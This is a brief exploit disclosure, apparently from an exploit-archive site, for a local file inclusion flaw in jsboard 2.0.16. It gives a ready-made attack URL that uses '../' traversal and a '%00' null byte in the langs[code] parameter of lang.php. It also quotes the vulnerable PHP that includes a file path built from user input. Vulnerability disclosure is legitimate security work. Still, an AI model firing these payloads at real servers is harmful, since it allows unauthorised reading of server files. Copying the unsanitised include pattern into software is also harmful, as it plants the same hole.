facebook facebook twitter rss

jsboard 2.0.16 Local File Include Vulnerability

Author: JIKO , Published: 23-05-2014
----------[exploit Debut]
[Local File Include Vulnerability]
----------[Script Info]

Author : JIKO

----------[Script Info]

Site : http://kldp.net/projects/jsboard/
Version : 2.0.16
Download : http://kldp.net/frs/download.php/6058/jsboard-2.0.16.tar.gz

----------[exploit Info]

Exploit :
http://Path/include/lang.php?langs[code]=File%00
Exemple :
http://Path/include/lang.php?langs[code]=../../../COPYING%00

Line : 13-17
Page : lang.php
Code :

if ($langs['code']) {
if (file_exists("$locate/{$langs['code']}.php")) {


include "$locate/{$langs['code']}.php";
} else { include "$locate/en.php"; }
}

else { include "$locate/en.php"; }

----------[exploit Fin]

Like us on Facebook :